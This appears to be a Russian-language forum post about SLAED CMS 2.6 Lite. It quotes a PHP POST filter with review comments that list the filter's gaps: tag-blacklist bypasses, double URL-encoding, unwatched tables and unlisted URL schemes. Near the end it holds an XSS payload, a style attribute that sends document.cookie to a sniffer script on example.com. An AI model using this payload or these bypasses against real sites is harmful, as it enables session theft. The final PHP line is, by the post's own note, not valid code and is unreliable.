Тогда как эта штука работает в пользовательских частях в про-версии? Там более хитрая система фильтрации?
Версия системы: SLAED CMS 2.6 Lite
Версия PHP: PHP 5
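// Request filter: walks every POST field and reports (a) URL-looking values,
// (b) a blacklist of HTML tags from non-editor users, and (c) references to the
// admins/users tables (plain, base64-encoded, or split with /* */ comments).
// Reporting goes through warn_report()/hack_report(), defined elsewhere.
//
// Review notes on what this filter does NOT cover (no code change, flagging only):
//  - The HTML check is a tag blacklist; attribute/CSS payloads that use none of the
//    listed tag names (e.g. a style="...expression(...)" attribute, img onerror, svg)
//    pass through untouched.
//  - urldecode() is applied once, so a double-encoded "%253Cscript" survives the check
//    if some later layer decodes again (cannot confirm from here).
//  - Only the *_admins / *_users table names are watched; any other table,
//    information_schema, or a UNION against something else is not detected.
//  - $confs['url_post'] vs $conf['redaktor']: two differently named config arrays are
//    read here — looks like a typo in one of them, confirm against the rest of the file.

// Loop-invariant settings, computed once instead of per field.
// isset() guard: in non-admin contexts $admin may be undefined; the original yielded 0 there (with notices).
$editor = isset($admin[3]) ? intval(substr($admin[3], 0, 1)) : 0;
$htmlCheckApplies = (defined("ADMIN_FILE") && $editor != 1)
    || (!defined("ADMIN_FILE") && $conf['redaktor'] != 1);
// preg_quote(): an unescaped $prefix containing regex metacharacters ("|", "(", ".")
// would either break the pattern (preg_match returns false => check silently disabled)
// or widen it. Identical for ordinary alphanumeric prefixes.
$quotedPrefix    = preg_quote($prefix, '#');
$security_string = "#" . $quotedPrefix . "_admins|" . $quotedPrefix . "_users#i";

foreach ($_POST as $var_name => $var_value) {
    // Nested arrays are flattened by fields_save() (defined elsewhere) before inspection.
    $var_value = is_array($var_value) ? fields_save($var_value) : $var_value;

    // (a) URL in a POST value. Note: "//" is listed twice, and javascript:, data:,
    // vbscript: and file:// are not in the list; a leading space also defeats the ^ anchor.
    if ($confs['url_post']) {
        if (preg_match("#^(http\:\/\/|ftp\:\/\/|\/\/|https:\/\/|php:\/\/|\/\/)#i", $var_value)) {
            warn_report("URL in POST - " . $var_name . " = " . $var_value);
        }
    }

    // (b) HTML tag blacklist, skipped for users allowed to use the editor.
    if ($htmlCheckApplies
        && preg_match("#<.*?(script|body|object|iframe|applet|meta|form).*?>#i", urldecode($var_value))) {
        warn_report("HTML in POST - " . $var_name . " = " . $var_value);
    }

    // (c1) Table names hidden in a base64 payload. base64_decode() is lenient and may
    // return garbage for non-base64 input; a false positive here is only a report.
    $security_decode = base64_decode($var_value);
    if (preg_match($security_string, $security_decode)) {
        hack_report("XSS base64 in POST - " . $var_name . " = " . $var_value);
    }

    // (c2) Table names in the raw value.
    if (preg_match($security_string, $var_value)) {
        hack_report("XSS in POST - " . $var_name . " = " . $var_value);
    }

    // (c3) Table names split with SQL block comments, e.g. "adm/**/ins".
    // Fix: the "s" modifier makes "." span newlines; without it a comment containing a
    // line break ("/*\n*/") was not stripped and the split name went undetected.
    // Only /* */ is handled; "#" and "-- " line comments are not.
    $security_slash = preg_replace("#\/\*.*?\*\/#s", "", $var_value);
    if (preg_match($security_string, $security_slash)) {
        hack_report("XSS in POST - " . $var_name . " = " . $var_value);
    }
}
} // closes a block opened before this excerpt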
// URL-in-POST check quoted on its own. The pattern is anchored at the start of the value,
// so a leading space defeats it, "\/\/" appears twice, and schemes such as javascript:,
// data:, vbscript: or file:// are not listed — a value starting with one of those is not
// reported. warn_report() is defined elsewhere.
$urlSchemePattern = "/^(http\:\/\/|ftp\:\/\/|\/\/|https:\/\/|php:\/\/|\/\/)/i";
if (preg_match($urlSchemePattern, $var_value) === 1) {
    warn_report("URL in POST - " . $var_name . " = " . $var_value);
}
style="background-image: url('http://example.com/sniffer.php?cookie=' + expression(document.cookie));"
// NOTE(review): as quoted, this line is not valid PHP — the second array holds "\", an
// unterminated string literal, and the first mapping replaces "'" with itself (a no-op).
// Presumably the original used HTML entities (e.g. &#039; / &#92;) that were lost when
// the post was rendered; confirm against the real source before relying on it.
// Also note stripslashes() runs first, so the value is un-escaped and then re-encoded
// by whatever the real replacement pairs are.
$comment = str_replace(array("'", "\\"), array("'", "\"), stripslashes($comment));